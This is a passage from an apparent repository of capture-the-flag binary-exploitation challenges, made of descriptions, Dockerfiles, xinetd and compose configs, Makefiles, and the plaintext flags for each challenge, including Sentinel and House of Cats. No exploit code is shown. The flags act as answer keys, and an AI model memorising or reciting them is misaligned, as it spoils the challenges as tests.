4 | type = UNLISTED 5 | wait = no 6 | server = /home/Formatfree/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Formatfree 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -z now -z noexecstack -fpie -fstack-protector formatfree.c -o formatfree 3 | strip formatfree 4 | 5 | clean: 6 | rm formatfree 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Grocery Shop 3 | 4 | Category 
: 5 | Pwn 6 | 7 | Desc : 8 | The grocery shop's new merchandise management system 9 | 10 | Hint : 11 | My precious!!! 12 | It's priceless, but i somehow lost track of it at some point. 13 | 14 | Estimated Difficulty : 15 | 4/10 16 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m Groceryshop 8 | RUN chown -R root:root /home/Groceryshop 9 | RUN chmod -R 755 /home/Groceryshop 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | groceryshop: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Groceryshop:ro 8 | - ./xinetd:/etc/xinetd.d/grocery_shop:ro 9 | ports: 10 | - "10103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/share/flag: -------------------------------------------------------------------------------- 1 | flag{Br0k3n_7ran51t1v3_l4w_g3ts_me_3v3rytime} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/share/grocery_shop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Grocery_Shop/distribute/share/grocery_shop 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Groceryshop/grocery_shop 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service grocery_shop 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Groceryshop/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Groceryshop 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h 3 | gcc -Wl,-z,now -fpie -fstack-protector-all grocery_shop.c -o grocery_shop 4 | strip grocery_shop 5 | rm SECCOMP.h 6 | 7 | clean: 8 | rm grocery_shop 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Guardian 3 | 4 | Category : 5 | Pwn, Sandbox 6 | 7 | Desc : 8 | Too much freedom with syscall sentinel last year... 9 | So we hired a new guardian to watch your library usages! 10 | 11 | Estimated Difficulty : 12 | 7/10 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | guardian: 5 | build: . 
6 | volumes: 7 | - ./share/:/home/guardian/:ro 8 | - ./init:/init:ro 9 | - ./xinetd:/etc/xinetd.d/guardian:ro 10 | ports: 11 | - "10101:10101" 12 | expose: 13 | - "10101" 14 | privileged: true 15 | restart: always 16 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/init: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | dockerd & 4 | sleep 5 #ad-hoc wait for dockerd to initialize 5 | 6 | cd /home/guardian/challenge 7 | docker compose build 8 | 9 | /usr/sbin/xinetd -dontfork 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04@sha256:b4b521bfcec90b11d2869e00fe1f2380c21cbfcd799ee35df8bd7ac09e6f63ea 2 | MAINTAINER James 3 | 4 | RUN apt-get update && apt-get install libc6 -qy 5 | COPY /share/guardian.conf /etc/ld.so.conf.d/guardian.conf 6 | RUN rm /etc/ld.so.cache && ldconfig -N 7 | 8 | CMD ["/bin/bash"] 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | guardian: 5 | build: . 
6 | volumes: 7 | - ./share/libguardian.so:/lib/x86_64-linux-gnu/x86_64/libguardian.so:ro 8 | - ./share/ld.so.preload:/etc/ld.so.preload:ro 9 | - ./share/flag:/root/flag:ro 10 | stdin_open: true 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/share/flag: -------------------------------------------------------------------------------- 1 | BALSN{s3nt1nel_d3fea7ed!_gu4rdian_bypa5sed!_wh4t_sh0uld_I_try_n3xt_y34r?} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/share/guardian.conf: -------------------------------------------------------------------------------- 1 | # sandbox 2 | /lib/x86_64-linux-gnu/x86_64 3 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/share/ld.so.preload: -------------------------------------------------------------------------------- 1 | /lib/x86_64-linux-gnu/x86_64/libguardian.so 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/share/libguardian.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Guardian/distribute/share/challenge/share/libguardian.so
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/xinetd: --------------------------------------------------------------------------------
# xinetd entry for the outer Guardian container: every TCP connection on port
# 10101 runs /home/guardian/run.sh.
# NOTE(review): the handler runs as root, and the docker-compose.yml for this
# service sets `privileged: true` while /init starts dockerd - presumably
# run.sh launches the nested challenge container per connection (run.sh is not
# shown on this page; confirm). Root in a privileged container is effectively
# root on the Docker host, so this service belongs on a dedicated, disposable
# VM, and the nested container should be the only thing a player can reach.
service guardian
{
    disable = no
    type = UNLISTED
    wait = no
    server = /home/guardian/run.sh
    socket_type = stream
    protocol = tcp
    user = root
    groups = yes
    bind = 0.0.0.0
    port = 10101
    flags = REUSE
}
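-------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/sourcecode/Makefile: --------------------------------------------------------------------------------
# Build libguardian.so, the shared object that the challenge image lists in
# /etc/ld.so.preload.
# -shared -fPIC produces a position-independent shared library, -Wl,-z,now binds
# all symbols at load time, -fstack-protector-all puts a canary in every function.
all:
	gcc -shared -fPIC -fstack-protector-all -Wl,-z,now guardian.c pathlib.c util.c -o libguardian.so
# Remove the artifact that `all` actually produces (libguardian.so); no file
# named "guardian" is ever built, so removing that name would always fail.
clean:
	rm libguardian.so
-------------------------------------------------------------------------------- /MyChallenges/Pwn/HelloWorld/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Hello World 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | A simple AI to greet the customers (chuckles 9 | 10 | Estimated Difficulty : 11 | 3/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/HelloWorld/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.04 2 | 3 | RUN apt-get update 4 | RUN apt-get dist-upgrade -y 5 | RUN apt-get install socat -y 6 | 7 | COPY libc64_2.29.so /lib/x86_64-linux-gnu/libc-2.29.so 8 | COPY ld64_2.29.so /lib64/ld-linux-x86-64.so.2 9 | 10 | RUN useradd -m hello 11 | COPY helloworld flag /home/hello/ 12 | RUN chown -R root:hello /home/hello 13 | RUN chmod -R 750 /home/hello/ 14 | EXPOSE 4444 15 | USER hello 16 | CMD socat -T30 TCP-LISTEN:4444,reuseaddr,fork EXEC:/home/hello/helloworld 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/HelloWorld/flag: -------------------------------------------------------------------------------- 1 | FLAG{the_Ultimate_Guide_to_becoming_a_Computer_Geek} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/HelloWorld/helloworld: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/HelloWorld/helloworld 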
-------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | House of Cats 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | (ΦωΦ) nyan 9 | 10 | Hint : 11 | tcache! 12 | 13 | Note : 14 | consider spinning up a vm instance near our server if network latency is unbearable 15 | 16 | Estimated Difficulty : 17 | 9/10 18 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/House_of_Cats.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/House_of_Cats.key -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd bsdmainutils bc -qy 6 | RUN useradd -m HouseofCats 7 | RUN chown -R root:root /home/HouseofCats 8 | RUN chmod -R 755 /home/HouseofCats 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | houseofcats: 5 | build: . 
6 | volumes: 7 | - ./share:/home/HouseofCats:ro 8 | - ./xinetd:/etc/xinetd.d/houseofcats:ro 9 | ports: 10 | - "10104:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/share/flag: -------------------------------------------------------------------------------- 1 | BALSN{I_10v3_c47s_h0w_abt_y0u?M30W_ME0W_MEOW_M3OW} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/share/house_of_cats: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/distribute/share/house_of_cats -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service houseofcats 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/HouseofCats/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = root 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/exploit/exp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | python3 exp_fast.py 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all house_of_cats_armoured.c -o house_of_cats 3 | strip house_of_cats 4 | 5 | clean: 6 | rm house_of_cats 7 | -------------------------------------------------------------------------------- 
/MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats_armoured: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats_armoured -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats_noprintf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats_noprintf -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Illusion 3 | 4 | Category : 5 | Pwn, Reverse 6 | 7 | Desc : 8 | A thin veil of texture to fabricate the illusion of pwnable vulnerability 9 | 10 | Estimated Difficulty : 11 | 4/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m Illusion 7 | RUN chown -R root:root /home/Illusion 8 | RUN chmod -R 755 /home/Illusion 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | illusion: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Illusion:ro 8 | - ./xinetd:/etc/xinetd.d/illusion:ro 9 | ports: 10 | - "10104:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{D0kk1ri_T3x7ure} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/share/illusion: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Illusion/distribute/share/illusion -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Illusion/illusion 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service illusion 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Illusion/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Illusion 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 
2 | gcc -Wl,-z,lazy -fpie -fstack-protector-all -fno-builtin-printf illusion.c -o illusion 3 | python3 illusion.py illusion 4 | 5 | clean: 6 | rm illusion 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Oldnote 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Old, but gold 9 | 10 | Hint : 11 | Sometimes programmers make exploitable mistakes 12 | Other times they don't, 13 | This is when libraries come to hackers' aid 14 | 15 | Estimated Difficulty : 16 | 4/10 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | oldnote: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Oldnote:ro 8 | - ./xinetd:/etc/xinetd.d/oldnote:ro 9 | ports: 10 | - "10102:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/ld-2.26.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Oldnote/distribute/ld-2.26.so -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/libc-2.26.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Oldnote/distribute/libc-2.26.so -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/share/flag: -------------------------------------------------------------------------------- 1 | 
flag{g00d_0ld_t1me_wh3n_tc4ch3_1s_571ll_cut3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/share/oldnote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Oldnote/distribute/share/oldnote -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Oldnote/oldnote 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service oldnote 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Oldnote/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Oldnote 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all oldnote.c -o oldnote 3 | strip oldnote 4 | 5 | clean: 6 | rm oldnote 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Robot 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | In some parallel Dystopian world, robots are already smarter than humans 9 | 10 | Estimated Difficulty : 11 | 4/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/Dockerfile: 
-------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m robot 8 | RUN chown -R root:root /home/robot 9 | RUN chmod -R 755 /home/robot 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | robot: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/robot:ro 8 | - ./xinetd:/etc/xinetd.d/robot:ro 9 | ports: 10 | - "30202:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{beep_bo0op_b33p_be3p_boop} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/share/robot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Robot/distribute/share/robot -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/robot/robot 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/xinetd: 
-------------------------------------------------------------------------------- 1 | service robot 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/robot/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = robot 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -z lazy -z noexecstack -fstack-protector robot.c -o robot 3 | strip robot 4 | 5 | clean: 6 | rm robot 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | STACK 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Super TAsk traCKer helps you keep track of everyday tasks 9 | 10 | Hint : 11 | tcache! 12 | 13 | Note : 14 | consider spinning up a vm instance near our server if network latency is unbearable 15 | 16 | Estimated Difficulty : 17 | 8/10 18 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/STACK.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/STACK/STACK.key -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m STACK 7 | RUN chown -R root:root /home/STACK 8 | RUN chmod -R 755 /home/STACK 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- 
/MyChallenges/Pwn/STACK/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | stack: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/STACK:ro 8 | - ./xinetd:/etc/xinetd.d/stack:ro 9 | ports: 10 | - "10103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/share/flag: -------------------------------------------------------------------------------- 1 | BALSN{S74ck_bu7_4ctua11y_N0t_5taCk} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 600 /home/STACK/stack 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/share/stack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/STACK/distribute/share/stack -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service stack 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/STACK/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = STACK 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all STACK_armoured.c -o STACK 3 | strip STACK 4 | 5 | clean: 6 | rm STACK 
7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/sourcecode/development/STACK: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/STACK/sourcecode/development/STACK -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/sourcecode/development/STACK_armoured: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/STACK/sourcecode/development/STACK_armoured -------------------------------------------------------------------------------- /MyChallenges/Pwn/Secret_Keeper2/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Secret Keeper 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Secret Keeper Inc. 9 | Have you ever thought of sharing your secret with others, but worried about whether they can keep the secret? If the answer is yes, Secret Keeper Inc. is your perfect choice. Share your secret and we will keep it. 
10 | 11 | Estimated Difficulty : 12 | 2/10 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Secret_Keeper2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.04 2 | 3 | RUN apt-get update 4 | RUN apt-get dist-upgrade -y 5 | RUN apt-get install socat -y 6 | 7 | COPY libc64_2.29.so /lib/x86_64-linux-gnu/libc-2.29.so 8 | COPY ld64_2.29.so /lib64/ld-linux-x86-64.so.2 9 | 10 | RUN useradd -m secret 11 | COPY secret_keeper flag /home/secret/ 12 | RUN chown -R root:secret /home/secret 13 | RUN chmod -R 750 /home/secret/ 14 | EXPOSE 4444 15 | USER secret 16 | CMD socat -T30 TCP-LISTEN:4444,reuseaddr,fork EXEC:/home/secret/secret_keeper 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Secret_Keeper2/flag: -------------------------------------------------------------------------------- 1 | FLAG{https://www.memesmonkey.com/topic/secret#&gid=1&pid=1} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Secret_Keeper2/secret_keeper_v2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Secret_Keeper2/secret_keeper_v2 -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Sentinel 3 | Sentinel Revenge 4 | 5 | Category : 6 | Pwn, Misc 7 | 8 | Desc : 9 | ------------------------------------------------------- 10 | Here is your shell 11 | But never forget 12 | Sentinel is watching you 13 | ------------------------------------------------------- 14 | You evaded all surveillance by sentinel 15 | Now his big brother is here for revenge 16 | 17 | Estimated Difficulty : 18 | 5/10 19 | 
8/10 20 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/README.md: -------------------------------------------------------------------------------- 1 | # Sentinel 2 | 3 | Bypass a seemingly invincible sandbox by abusing filesystem quirks 4 | 5 | | | Solves | 6 | | --------- | ------ | 7 | | original | 8/584 | 8 | | revenge | 5/584 | 9 | 10 | ## Making of the Challenge 11 | 12 | TBD 13 | 14 | ## Writeup 15 | 16 | TBD 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/.dockerignore: -------------------------------------------------------------------------------- 1 | **/.git 2 | **/.gitignore 3 | **/.DS_Store 4 | **/node_modules 5 | **/Thumbs.db 6 | **/*~ 7 | src/.keep 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeBin/sentinel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Sentinel/distribute/challengeBin/sentinel -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeBin/sentinelRevenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Sentinel/distribute/challengeBin/sentinelRevenge -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeFlag/fakeFlag: -------------------------------------------------------------------------------- 1 | B415N{fake flag} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeFlag/flag: 
-------------------------------------------------------------------------------- 1 | BALSN{l4y1n6_l0w_5eek1ng_0u7_7he_upp3r_pl4c3s_wh3r3_7h3_in0d3_tr4nsp0s3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeFlag/flagRevenge: -------------------------------------------------------------------------------- 1 | BALSN{rem3mb3r_m3_70_0n3_wh0_l1v35_th3r3_1t_0nc3_wa5_4_7ru3_cl0n3_0f_m1n3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | sentinel: 5 | build: ./ 6 | volumes: 7 | - ./share/:/home/sentinel/:rw 8 | - ./tmp/:/tmp2/:rw 9 | - ./init:/init:ro 10 | - ./xinetd:/etc/xinetd.d/sentinel:ro 11 | ports: 12 | - "10101:10101" 13 | expose: 14 | - "10101" 15 | privileged: true 16 | restart: always 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/init: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | mkdir -p /tmp2/dockerRoot 4 | chown -R root:root /home/sentinel 5 | dockerd --data-root=/tmp2/dockerRoot --storage-driver overlay2 & 6 | /usr/sbin/xinetd -dontfork 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec timeout 1800 python3 /home/sentinel/instanceManager.py /tmp2/instances/ /home/sentinel/guest_home/ 24 dummySecret 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service sentinel 2 | { 3 | 
